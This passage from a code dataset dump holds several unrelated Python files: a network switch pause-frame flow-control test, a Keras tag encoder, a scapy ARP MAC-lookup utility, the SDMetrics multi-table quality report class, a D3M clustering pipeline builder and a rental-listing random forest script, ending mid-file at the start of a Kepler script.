pause_frame = ({\"Ethernet\": {\"dst\": \"01:80:C2:00:00:01\",\n \"src\": \"00:00:00:00:01:44\",\n \"type\": 0x8808}},\n {\"Pause\": {\"opcode\": 0x0001,\n \"ptime\": quanta_value}})\n stream = env.tg[1].set_stream(pause_frame,\n iface=ports[('tg1', 'sw1')][3],\n rate=pause_frame_rate,\n continuous=True)\n\n # Send stream of pause frames from TG port 2.\n env.tg[1].start_streams([stream, ])\n time.sleep(3)\n\n self.suite_logger.debug(\"Start sniffer for detecting pause frames\")\n env.tg[1].start_sniff(sniff_ports, sniffing_time=5, filter_layer='PAUSE')\n time.sleep(5)\n\n # Define transmit rate limits on TG port 1 and port 2 after sending pause frames to \"RxTx\" flow control port.\n tx_test_rate1 = env.tg[1].get_port_txrate(ports[('tg1', 'sw1')][1])\n tx_test_rate2 = env.tg[1].get_port_txrate(ports[('tg1', 'sw1')][2])\n # Define receive rate limit on TG port 3 after sending pause frames to \"RxTx\" flow control port.\n rx_test_rate3 = env.tg[1].get_port_rxrate(ports[('tg1', 'sw1')][3])\n\n self.suite_logger.debug(\"Stop sniffer\")\n data = env.tg[1].stop_sniff(sniff_ports)\n # Stop streams of unicast packets and pause frames.\n env.tg[1].stop_streams([stream_1, stream_2, stream, ])\n\n # Verify that pause frames are not forwarded from tested ports.\n params = ({'layer': \"Ethernet\", 'field': \"src\", 'value': \"00:00:00:00:01:44\"}, )\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[0],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 1 when 'RxTx' is configured on all tested ports.\"\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[1],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 2 when 'RxTx' is configured on all tested ports.\"\n assert 
len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[2],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 3 when 'RxTx' is configured on all tested ports.\"\n\n # Verify that line rate on TG port 3 decreases after pause frames with middle quanta are sending.\n if self.rate_decreasing(pf_rate=pause_frame_rate,\n quanta=quanta_value,\n pause_frame_size=64,\n full_rate=self.full_rate(sw_instance=env.switch[1],\n tested_port=ports[('sw1', 'tg1')][3],\n frame_size=64),\n actual_rate=rx_test_rate3):\n self.suite_logger.debug(\"Line rate decreases properly when stream of pause frames with middle quanta is sent to 'RxTx' port.\")\n else:\n pytest.fail(\"Line rate is not decreased properly when stream of pause frames with middle quanta is sent to 'RxTx' port.\")\n\n # Verify that transmit line rate on TG port 1 is decreased according to configured \"RxTx\" flow control on all tested ports.\n if not abs(tx_test_rate1 - (rx_test_rate3 // 2)) <= rx_test_rate3 // 2 * 101 // 100:\n pytest.fail(\"Transmit line rate is not decreased accordingly to detected overflow on 'RxTx' egress port.\")\n\n # Verify that transmit line rate on TG port 2 is decreased according to configured \"RxTx\" flow control on all tested ports.\n if not abs(tx_test_rate2 - (rx_test_rate3 // 2)) <= rx_test_rate3 / 2 * 101 // 100:\n pytest.fail(\"Transmit line rate is not decreased accordingly to detected overflow on 'RxTx' egress port.\")\n","sub_path":"l2/pause_frames/test_pfc_samples.py","file_name":"test_pfc_samples.py","file_ext":"py","file_size_in_byte":15147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"206305969","text":"import pickle\nimport json\nimport numpy as np\nfrom keras.utils import to_categorical\n\nfrom keras.preprocessing.text import Tokenizer\n\nhair_tags = ['orange hair', 'white hair', 'aqua hair', 'gray hair',\n 'green hair', 'red hair', 'purple hair', 'pink hair',\n 'blue hair', 'black hair', 'brown hair', 'blonde hair']\n\neyes_tags = ['gray eyes', 'black eyes', 'orange eyes',\n 'pink eyes', 'yellow eyes', 'aqua eyes', 'purple eyes',\n 'green eyes', 'brown eyes', 'red eyes', 'blue eyes']\n\nnum_classes = len(hair_tags) + len(eyes_tags) + 1\n\ntokenizer = Tokenizer(num_words=num_classes,\n filters='!\"#$%&()*+,-./:;<=>?@[\\]^`{|}~\\t\\n',\n lower=True, split=',', char_level=False)\n\ntokenizer.fit_on_texts(hair_tags + eyes_tags)\n\nwith open('tokenizer.pickle', 'wb') as handle:\n pickle.dump(tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nprint(tokenizer.word_index)\nprint(tokenizer.word_counts)\n\ny_tags = []\nwith open('tags_clean.csv', 'r') as f:\n for line in f.readlines():\n line = line.strip('\\n')\n n, tags = line.split(',')\n\n if int(n) != len(y_tags):\n print('index error at line %d: %s' % (len(y_tags), line))\n exit(0)\n else:\n text = ','.join([tag.split(':')[0].rstrip(' ') for tag in tags.rstrip('\\t').split('\\t')])\n y_tags.append(text)\n\n# json.dump(y_tags, open('y_tags_onehot.txt', 'w'), separators=(',\\n', ':'))\n\n\ndef tags_to_onehot(tags):\n seqs = tokenizer.texts_to_sequences(tags)\n return np.array([np.sum(to_categorical(seq, num_classes), axis=-2) for seq in seqs])\n\ny_onehot = tags_to_onehot(y_tags)\n\nprint(y_onehot[:20])\n\nnp.save('y_onehot.npy', y_onehot)\n\nnp.save('hair_onehot.npy', tags_to_onehot(hair_tags))\nnp.save('eyes_onehot.npy', tags_to_onehot(eyes_tags))\n\neyes_hair_tags = ['%s,%s' % (eyes_tag, hair_tag) for eyes_tag in eyes_tags for hair_tag 
in hair_tags]\neyes_hair_onehot = tags_to_onehot(eyes_hair_tags)\n\nnp.save('eyes_hair_onehot.npy', eyes_hair_onehot)\n","sub_path":"hw4/process_label_onehot.py","file_name":"process_label_onehot.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"105653857","text":"#!/usr/bin/env python3\n# -*- encoding = utf-8 -*-\n# 该代码由本人学习时编写,仅供自娱自乐!\n# 本人QQ:1945962391 \n# 欢迎留言讨论,共同学习进步!\n\n\nfrom netifaces import interfaces, ifaddresses, AF_INET, AF_INET6\nfrom scapy.layers.l2 import ARP\nfrom scapy.sendrecv import sr1\nimport netifaces as ni\nimport platform\nimport netifaces\nimport time\n\n\ndef get_connection_name_from_guid(iface_guids): # 获取接口名称\n if platform.system() == \"Windows\":\n import winreg as wr\n # 产生接口名字清单,默认全部填写上'(unknown)'\n iface_names = ['(unknown)' for i in range(len(iface_guids))]\n # 打开\"HKEY_LOCAL_MACHINE\"\n reg = wr.ConnectRegistry(None, wr.HKEY_LOCAL_MACHINE)\n # 打开r'SYSTEM\\CurrentControlSet\\Control\\Network\\{4d36e972-e325-11ce-bfc1-08002be10318}'\n #\n reg_key = wr.OpenKey(reg, r'SYSTEM\\CurrentControlSet\\Control\\Network\\{4d36e972-e325-11ce-bfc1-08002be10318}')\n for i in range(len(iface_guids)):\n try:\n # 尝试读取每一个接口ID下对应的Name\n reg_subkey = wr.OpenKey(reg_key, iface_guids[i] + r'\\Connection')\n # 如果存在Name,就按照顺序写入iface_names\n iface_names[i] = wr.QueryValueEx(reg_subkey, 'Name')[0]\n except FileNotFoundError:\n pass\n # 把iface_guids, iface_names 压在一起返回\n return zip(iface_guids, iface_names)\n\n\ndef get_ifname(ifname):\n if platform.system() == \"Linux\":\n return ifname\n elif platform.system() == \"Windows\":\n import winreg as wr\n x = ni.interfaces()\n for i in get_connection_name_from_guid(x):\n # 找到名字所对应的接口ID并返回\n if i[1] == ifname:\n return i[0]\n else:\n print('操作系统不支持,本脚本只能工作在Windows或者Linux环境!')\n\n\ndef get_mac_address(ifname): # 获取接口MAC地址\n return netifaces.ifaddresses(get_ifname(ifname))[netifaces.AF_LINK][0]['addr']\n\n\ndef get_ip_address(ifname): # 获取接口ip地址\n return ifaddresses(get_ifname(ifname))[AF_INET][0]['addr']\n\n\ndef get_ipv6_address(ifname): # 获取接口ipv6地址\n return ifaddresses(get_ifname(ifname))[AF_INET6][0]['addr']\n\n\ndef arp_request(dst, ifname): # 构建arp请求函数\n hwsrc = get_mac_address(ifname)\n psrc = get_ip_address(ifname)\n try:\n arp_pkt = sr1(ARP(op=1, hwsrc=hwsrc, psrc=psrc, pdst=dst), timeout=5, verbose=False)\n return dst, arp_pkt.getlayer(ARP).fields['hwsrc']\n except AttributeError:\n return dst, None\n\n\nif __name__ == '__main__':\n hostname = input('请输入需要请求的目的IP地址:')\n iface = input('请输入本机网卡接口名称:')\n print('正在请求', hostname, '的MAC地址,请稍等!')\n time.sleep(2)\n arp_result = arp_request(hostname, iface)\n if arp_result[1] is not None:\n print('请求结果如下:')\n print('主机:', arp_result[0], 'MAC地址为:', arp_result[1])\n else:\n print('请求失败。请确保网络可达!')\n\n\n","sub_path":"ARP/ARP_Request_new.py","file_name":"ARP_Request_new.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154796669","text":"\"\"\"Multi table quality report.\"\"\"\n\nimport pickle\nimport sys\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport pkg_resources\nimport tqdm\n\nfrom sdmetrics.reports.multi_table._properties import Cardinality, ColumnPairTrends, ColumnShapes\nfrom sdmetrics.reports.utils import validate_multi_table_inputs\n\n\nclass QualityReport():\n \"\"\"Multi table quality report.\n\n This class creates a quality report for multi-table data. 
It calculates the quality\n score along three properties - Column Shapes, Column Pair Trends, and Cardinality.\n \"\"\"\n\n def __init__(self):\n self._tables = []\n self._overall_quality_score = None\n self._properties_instances = {}\n self._properties_scores = {}\n self._is_generated = False\n self._package_version = None\n self._property_errors = {}\n\n def _print_results(self, out=sys.stdout):\n \"\"\"Print the quality report results.\"\"\"\n if pd.isna(self._overall_quality_score) & any(self._property_errors.values()):\n out.write('\\nOverall Quality Score: Error computing report.\\n\\n')\n else:\n out.write(\n f'\\nOverall Quality Score: {round(self._overall_quality_score * 100, 2)}%\\n\\n')\n\n out.write('Properties:\\n')\n\n for property_name, score in self._properties_scores.items():\n if not pd.isna(score):\n out.write(f'{property_name}: {round(score * 100, 2)}%\\n')\n elif property_name in self._property_errors:\n out.write(f'{property_name}: Error computing property.\\n')\n else:\n out.write(f'{property_name}: NaN\\n')\n\n def generate(self, real_data, synthetic_data, metadata, verbose=True):\n \"\"\"Generate report.\n\n Args:\n real_data (pandas.DataFrame):\n The real data.\n synthetic_data (pandas.DataFrame):\n The synthetic data.\n metadata (dict):\n The metadata, which contains each column's data type as well as relationships.\n verbose (bool):\n Whether or not to print the report summary and progress.\n \"\"\"\n validate_multi_table_inputs(real_data, synthetic_data, metadata)\n\n self._tables = list(real_data.keys())\n\n self._properties_instances = {\n 'Column Shapes': ColumnShapes(),\n 'Column Pair Trends': ColumnPairTrends(),\n 'Cardinality': Cardinality()\n }\n\n if verbose:\n sys.stdout.write('Generating report ...\\n')\n\n num_columns = [len(table['columns']) for table in metadata['tables'].values()]\n num_properties = len(self._properties_instances)\n progress_bar = None\n for index, property_tuple in enumerate(self._properties_instances.items()):\n property_name, property_instance = property_tuple\n if verbose:\n if property_name == 'Column Shapes':\n num_iterations = sum(num_columns)\n elif property_name == 'Column Pair Trends':\n # for each table, the number of combinations of pairs of columns is\n # n * (n - 1) / 2, where n is the number of columns in the table\n num_iterations = sum([(n_cols * (n_cols - 1)) // 2 for n_cols in num_columns])\n elif property_name == 'Cardinality':\n num_iterations = len(metadata['relationships'])\n\n progress_bar = tqdm.tqdm(total=num_iterations, file=sys.stdout)\n progress_bar.set_description(\n f'({index + 1}/{num_properties}) Evaluating {property_name}: ')\n\n try:\n self._properties_scores[property_name] = property_instance.get_score(\n real_data, synthetic_data, metadata, progress_bar)\n except BaseException:\n self._properties_scores[property_name] = np.nan\n self._property_errors[property_name] = True\n\n if verbose:\n progress_bar.close()\n\n scores = list(self._properties_scores.values())\n self._overall_quality_score = np.nanmean(scores)\n self._is_generated = True\n\n if verbose:\n self._print_results(sys.stdout)\n\n def _validate_generated(self):\n if not self._is_generated:\n raise ValueError(\n \"The report has not been generated yet. 
Please call the 'generate' method.\")\n\n def get_score(self):\n \"\"\"Return the overall quality score.\n\n Returns:\n float\n The overall quality score.\n \"\"\"\n self._validate_generated()\n\n return self._overall_quality_score\n\n def get_properties(self):\n \"\"\"Return the score for each property.\n\n Returns:\n pandas.DataFrame\n The score for each property.\n \"\"\"\n self._validate_generated()\n\n return pd.DataFrame({\n 'Property': self._properties_scores.keys(),\n 'Score': self._properties_scores.values(),\n })\n\n def _validate_inputs(self, property_name, table_name):\n self._validate_generated()\n\n valid_properties = list(self._properties_instances.keys())\n if property_name not in valid_properties:\n raise ValueError(\n f\"Invalid property name ('{property_name}'). \"\n f'It must be one of {valid_properties}.'\n )\n\n if (table_name is not None) and (table_name not in self._tables):\n raise ValueError(f\"Unknown table ('{table_name}'). Must be one of {self._tables}.\")\n\n def _validate_visualization(self, property_name, table_name):\n self._validate_inputs(property_name, table_name)\n if property_name in ['Column Shapes', 'Column Pair Trends'] and table_name is None:\n raise ValueError('Table name must be provided when viewing details for '\n f\"property '{property_name}'.\")\n\n def get_visualization(self, property_name, table_name=None):\n \"\"\"Return a visualization for each score for the given property and table.\n\n Args:\n property_name (str):\n The name of the property to return score details for.\n table_name (str):\n The table to show scores for. Must be provided for 'Column Shapes'\n and 'Column Pair Trends'.\n\n Returns:\n plotly.graph_objects._figure.Figure\n A visualization of the requested property's scores.\n \"\"\"\n self._validate_visualization(property_name, table_name)\n\n return self._properties_instances[property_name].get_visualization(table_name)\n\n def _get_details_non_cardinality(self, property_instance, table_name):\n if table_name:\n details = {table_name: property_instance._properties[table_name]._details.copy()}\n else:\n details = {\n table_name: property_._details\n for table_name, property_ in property_instance._properties.items()\n }\n\n # Add a column with the table name for each details\n for table_name in details:\n table_column = pd.DataFrame({'Table': [table_name] * len(details[table_name])})\n details[table_name] = pd.concat([table_column, details[table_name]], axis=1)\n\n return pd.concat(list(details.values()), ignore_index=True)\n\n def _get_details_cardinality(self, property_instance, table_name):\n # For Cardinality, the details are a dictionary where the keys are tuples (table1, table2).\n # If table_name is passed, select only the tuples which contain it.\n details = property_instance._details\n if table_name:\n details = {\n table_names: detail\n for table_names, detail in details.items()\n if table_name in table_names\n }\n\n details_dataframe = pd.DataFrame()\n for tables, scores in details.items():\n new_row = pd.DataFrame({\n 'Child Table': [tables[0]],\n 'Parent Table': [tables[1]],\n 'Metric': ['CardinalityShapeSimilariy'],\n 'Score': [scores['score']]\n })\n details_dataframe = pd.concat([details_dataframe, new_row], ignore_index=True)\n\n return details_dataframe\n\n def get_details(self, property_name, table_name=None):\n \"\"\"Return the details for each score for the given property name.\n\n Args:\n property_name (str):\n The name of the property to return score details for.\n table_name (str):\n Optionally filter 
results by table.\n\n Returns:\n pd.DataFrame:\n The details of the scores of a property.\n \"\"\"\n self._validate_inputs(property_name, table_name)\n\n property_instance = self._properties_instances[property_name]\n if property_name != 'Cardinality':\n return self._get_details_non_cardinality(property_instance, table_name)\n else:\n return self._get_details_cardinality(property_instance, table_name)\n\n def save(self, filepath):\n \"\"\"Save this report instance to the given path using pickle.\n\n Args:\n filepath (str):\n The path to the file where the report instance will be serialized.\n \"\"\"\n self._package_version = pkg_resources.get_distribution('sdmetrics').version\n\n with open(filepath, 'wb') as output:\n pickle.dump(self, output)\n\n @classmethod\n def load(cls, filepath):\n \"\"\"Load a ``QualityReport`` instance from a given path.\n\n Args:\n filepath (str):\n The path to the file where the report is stored.\n\n Returns:\n QualityReort:\n The loaded quality report instance.\n \"\"\"\n current_version = pkg_resources.get_distribution('sdmetrics').version\n\n with open(filepath, 'rb') as f:\n report = pickle.load(f)\n if current_version != report._package_version:\n warnings.warn(\n f'The report was created using SDMetrics version `{report._package_version}` '\n f'but you are currently using version `{current_version}`. '\n 'Some features may not work as intended.')\n\n return report\n","sub_path":"sdmetrics/reports/multi_table/quality_report.py","file_name":"quality_report.py","file_ext":"py","file_size_in_byte":10417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"120063772","text":"from typing import Optional\n\nfrom common_primitives.simple_profiler import SimpleProfilerPrimitive\nfrom d3m import index\nfrom d3m.metadata.base import ArgumentType\nfrom d3m.metadata.pipeline import Pipeline, PrimitiveStep, Resolver\nfrom d3m.primitives.data_cleaning.column_type_profiler import Simon\n\n\ndef create_pipeline(\n metric: str,\n n_jobs: int = -1,\n resolver: Optional[Resolver] = None,\n exclude_column=None,\n profiler=\"simple\",\n) -> Pipeline:\n\n # Creating pipeline\n input_val = \"steps.{}.produce\"\n pipeline_description = Pipeline()\n pipeline_description.add_input(name=\"inputs\")\n tune_steps = []\n\n # Step 0: Denormalize primitive -> put all resources in one dataframe\n step_0 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.denormalize.Common\"\n )\n )\n step_0.add_argument(\n name=\"inputs\", argument_type=ArgumentType.CONTAINER, data_reference=\"inputs.0\"\n )\n step_0.add_output(\"produce\")\n pipeline_description.add_step(step_0)\n previous_step = 0\n\n # Step 1: dataset_to_dataframe\n step_1 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.dataset_to_dataframe.Common\"\n )\n )\n step_1.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_1.add_output(\"produce\")\n pipeline_description.add_step(step_1)\n previous_step += 1\n\n # run profiler\n if profiler == \"simon\":\n step = PrimitiveStep(\n primitive_description=Simon.metadata.query(), resolver=resolver\n )\n step.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step.add_output(\"produce\")\n pipeline_description.add_step(step)\n previous_step += 1\n else:\n step = PrimitiveStep(\n 
primitive_description=SimpleProfilerPrimitive.metadata.query(),\n resolver=resolver,\n )\n step.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step.add_output(\"produce\")\n pipeline_description.add_step(step)\n previous_step += 1\n\n # Step 2 column parser -> labeled semantic types to data types\n step_2 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.column_parser.Common\"\n )\n )\n step_2.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_2.add_hyperparameter(\n name=\"exclude_columns\",\n argument_type=ArgumentType.VALUE,\n data=[exclude_column],\n )\n step_2.add_output(\"produce\")\n pipeline_description.add_step(step_2)\n previous_step += 1\n\n # Step 3: imputer -> imputes null values based on mean of column\n step_3 = PrimitiveStep(\n primitive=index.get_primitive(\"d3m.primitives.data_cleaning.imputer.SKlearn\")\n )\n step_3.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_3.add_hyperparameter(\n name=\"return_result\", argument_type=ArgumentType.VALUE, data=\"replace\"\n )\n step_3.add_hyperparameter(\n name=\"use_semantic_types\", argument_type=ArgumentType.VALUE, data=True\n )\n step_3.add_hyperparameter(\n name=\"exclude_columns\",\n argument_type=ArgumentType.VALUE,\n data=[exclude_column],\n )\n step_3.add_output(\"produce\")\n pipeline_description.add_step(step_3)\n previous_step += 1\n\n # Step 4: DISTIL/NK Hdbscan primitive -> unsupervised clustering of records with a label\n step_4 = PrimitiveStep(\n primitive=index.get_primitive(\"d3m.primitives.clustering.hdbscan.Hdbscan\")\n )\n step_4.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_4.add_hyperparameter(\n name=\"cluster_selection_method\", argument_type=ArgumentType.VALUE, data=\"leaf\"\n )\n step_4.add_output(\"produce\")\n pipeline_description.add_step(step_4)\n previous_step += 1\n clustering_step = previous_step\n tune_steps.append(previous_step)\n\n # Step 5: extract feature columns\n step_5 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.extract_columns_by_semantic_types.Common\"\n )\n )\n step_5.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(clustering_step),\n )\n step_5.add_output(\"produce\")\n pipeline_description.add_step(step_5)\n previous_step += 1\n feature_step = previous_step\n # Step 6: extract target columns\n step_6 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.extract_columns_by_semantic_types.Common\"\n )\n )\n step_6.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(clustering_step),\n )\n step_6.add_hyperparameter(\n name=\"semantic_types\",\n argument_type=ArgumentType.VALUE,\n data=(\"https://metadata.datadrivendiscovery.org/types/Target\",),\n )\n step_6.add_output(\"produce\")\n pipeline_description.add_step(step_6)\n previous_step += 1\n target_step = previous_step\n\n # Step 7: Random forest\n step_7 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.learner.random_forest.DistilEnsembleForest\"\n )\n )\n step_7.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n 
data_reference=input_val.format(feature_step),\n )\n step_7.add_argument(\n name=\"outputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(target_step),\n )\n step_7.add_hyperparameter(\"metric\", ArgumentType.VALUE, metric)\n step_7.add_hyperparameter(\"n_jobs\", ArgumentType.VALUE, n_jobs)\n step_7.add_hyperparameter(\"grid_search\", ArgumentType.VALUE, True)\n step_7.add_output(\"produce\")\n pipeline_description.add_step(step_7)\n previous_step += 1\n tune_steps.append(previous_step)\n\n # Step 8: construct predictions dataframe in proper format\n step_8 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.construct_predictions.Common\"\n )\n )\n step_8.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_8.add_argument(\n name=\"reference\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(clustering_step),\n )\n step_8.add_output(\"produce\")\n pipeline_description.add_step(step_8)\n previous_step += 1\n\n # Final Output\n pipeline_description.add_output(\n name=\"output predictions\", data_reference=input_val.format(previous_step)\n )\n return (pipeline_description, [])\n","sub_path":"processing/pipelines/semisupervised_tabular.py","file_name":"semisupervised_tabular.py","file_ext":"py","file_size_in_byte":7344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441490847","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 3 00:06:18 2017\r\n\r\n@author: Mike\r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport pandas as pd\r\n\r\ntrain_df = pd.read_json(open(\"train.json\", \"r\"))\r\ntest_df = pd.read_json(open(\"test.json\", \"r\"))\r\n\r\n#print(train_df.tail())\r\n\r\n\r\n# see the frequency of each feature\r\nimport collections\r\ndef most_common(lst):\r\n features = collections.Counter(lst)\r\n feature_value = features.keys()\r\n frequency = features.values()\r\n data = [('feature_value', feature_value),\r\n ('frequency', frequency),] \r\n df = pd.DataFrame.from_items(data)\r\n return df.sort_values(by = 'frequency', ascending = False)\r\n\r\n\r\ndef newColumn(name,df,series):\r\n feature = pd.Series(0,df.index,name = name)# data : 0\r\n for row,word in enumerate(series):\r\n if name in word:\r\n feature.iloc[row] = 1\r\n df[name] = feature # feature : series ; value in series : 1 or 0\r\n return df\r\n\r\n# select features based on frequency\r\nfacilities = ['Elevator','Cats Allowed','Hardwood Floors','Dogs Allowed','Doorman','Dishwasher','No Fee','Laundry in Building','Fitness Center']\r\nfor name in facilities:\r\n train_df = newColumn(name, train_df, train_df['features'])\r\nprint(train_df)\r\n\r\n\r\n\r\ndef newfeat(name, df, series):\r\n \"\"\"Create a Series for my feature building loop to fill\"\"\"\r\n feature = pd.Series(0, df.index, name=name)\r\n \"\"\"Now populate the new Series with numeric values\"\"\"\r\n for row, word in enumerate(series):\r\n if name in word:\r\n feature.iloc[row] = 1\r\n df[name] = feature\r\n return(df)\r\n \r\ntrain_df = newfeat('Elevator', train_df, train_df.features)\r\ntrain_df = newfeat('Dogs Allowed', train_df, train_df.features)\r\ntrain_df = newfeat('Cats Allowed', train_df, train_df.features)\r\ntrain_df = newfeat('Hardwood Floors', train_df, train_df.features)\r\ntrain_df = newfeat('Dishwasher', train_df, train_df.features)\r\ntrain_df = newfeat('Doorman', train_df, 
train_df.features)\r\n\r\ntrain_df[\"created\"] = pd.to_datetime(train_df[\"created\"])\r\ntrain_df[\"created_year\"] = train_df[\"created\"].dt.year\r\ntrain_df[\"created_month\"] = train_df[\"created\"].dt.month\r\ntrain_df[\"created_day\"] = train_df[\"created\"].dt.day\r\ntrain_df[\"num_photos\"] = train_df[\"photos\"].apply(len)\r\n\r\ntrain_df['price'] = train_df['price'].clip(upper=13000)\r\ntrain_df[\"logprice\"] = np.log(train_df[\"price\"])\r\n\r\n\r\ntrain_df[\"price_t\"] =train_df[\"price\"]/train_df[\"bedrooms\"]\r\n\r\n\r\ntrain_df[\"room_sum\"] = train_df[\"bedrooms\"]+train_df[\"bathrooms\"] \r\n\r\n\r\ntrain_df['price_per_room'] = train_df['price']/train_df['room_sum']\r\n\r\n\r\n\r\ntrain_df['latitude'] = round(train_df['latitude'], 2)\r\ntrain_df['longitude'] = round(train_df['longitude'], 2)\r\ntrain_df['latlong'] = train_df.latitude.map(str) + ', ' + train_df.longitude.map(str)\r\n#print(len(train_df['latlong'].unique()))\r\ntest_df['latitude'] = round(test_df['latitude'], 2)\r\ntest_df['longitude'] = round(test_df['longitude'], 2)\r\ntest_df['latlong'] = test_df.latitude.map(str) + ', ' + test_df.longitude.map(str)\r\n\r\nzipcode = pd.read_csv(\"zipcode.csv\")\r\n\r\n\r\ntrain_df= pd.merge(train_df, zipcode, how = 'left', on=['latlong'])\r\ntrain_df = train_df.drop('void',1)\r\ntest_df = pd.merge(test_df, zipcode, how = 'left', on=['latlong'])\r\ntest_df = test_df.drop('void',1)\r\n\r\n\r\n#print(train_zip.tail())\r\n\r\nb_id = pd.concat([train_df['building_id'], test_df['building_id']]).unique()\r\nb_id = pd.DataFrame(b_id)\r\nb_id.columns = ['building_id']\r\nb_id['building_index'] = [i for i in range(len(b_id))]\r\nm_id = pd.concat([train_df['manager_id'], test_df['manager_id']]).unique()\r\nm_id = pd.DataFrame(m_id)\r\nm_id.columns = ['manager_id']\r\nm_id['manager_index'] = [i for i in range(len(m_id))]\r\n#print(m_id)\r\ntrain_df= pd.merge(train_df, b_id, how = 'left', on=['building_id'])\r\ntrain_df= pd.merge(train_df, m_id, how = 'left', on=['manager_id'])\r\ntest_df = pd.merge(test_df, b_id, how = 'left', on=['building_id'])\r\ntest_df = pd.merge(test_df, m_id, how = 'left', on=['manager_id'])\r\n#print(train_zip.tail())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nprint(len(train_df))\r\n#print(train_df.tail())\r\n\r\nfeatures_to_use = [\"bathrooms\", \"bedrooms\", \"price\",\r\n \"num_photos\", \"Elevator\", \"Dogs Allowed\",'Hardwood Floors','Cats Allowed'\r\n ,'Dishwasher','Doorman',\r\n \"created_year\", \"created_month\", \"created_day\",'latitude','longitude'\r\n ]\r\n\r\ntarget_num_map = {'high':0, 'medium':1, 'low':2}\r\nX = train_df[features_to_use]\r\ny = np.array(train_df['interest_level'].apply(lambda x: target_num_map[x]))\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import log_loss\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, VotingClassifier \r\n\r\n\r\n\r\n\r\n\r\nrandom_state = 5000\r\n\r\n\r\nX_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.34, random_state = 5000)\r\n\r\n\r\nrf1 = RandomForestClassifier(n_estimators=250, criterion='entropy', n_jobs = 1, random_state=random_state)\r\nrf1.fit(X_train, y_train)\r\ny_val_pred = rf1.predict_proba(X_val)\r\ny_val_pred_acc = rf1.predict(X_val)\r\n\r\n\r\nprint(log_loss(y_val, y_val_pred))\r\n\r\nprint(accuracy_score(y_val, y_val_pred_acc))\r\n\r\n\r\n'''\r\nfrom sklearn import svm\r\nrf2 = svm.SVC()\r\nrf2.fit(X_train, y_train)\r\ny_val_pred2 = 
rf2.predict_proba(X_val)\r\ny_val_pred_acc2 = rf2.predict(X_val)\r\n\r\n\r\n\r\n\r\nprint(log_loss(y_val, y_val_pred2))\r\n\r\nprint(accuracy_score(y_val, y_val_pred_acc2))\r\n'''\r\n\r\n\r\n\r\n'''\r\ntrain_df['pet_friendly'] = train_df['Cats Allowed'] + train_df['Dogs Allowed']\r\nprint(train_df['pet_friendly'])\r\n'''\r\n\r\n\r\n'''\r\nfeature_value = train_df['features'].tolist()\r\n\r\nfeature_lst=[]\r\nfor i in range(len(feature_value)):\r\n feature_lst += feature_value[i]\r\n\r\nmylist = list(feature_lst)\r\nprint(mylist)\r\nprint(len(mylist))\r\n\r\nfrom collections import Counter\r\nc=Counter(mylist)\r\ndef Most_Common(lst):\r\n data = Counter(lst)\r\n return data.most_common(10)\r\nprint(Most_Common(mylist))\r\n'''","sub_path":"MySigma.py","file_name":"MySigma.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"169558885","text":"#!/usr/bin/env python\n\nfrom Gaugi.messenger import LoggingLevel\nfrom Gaugi import ToolSvc\n\nfrom kepler.core import ElectronLoop\nfrom kepler.core.enumerators import Dataframe as DataframeEnum\n\nimport argparse\nimport 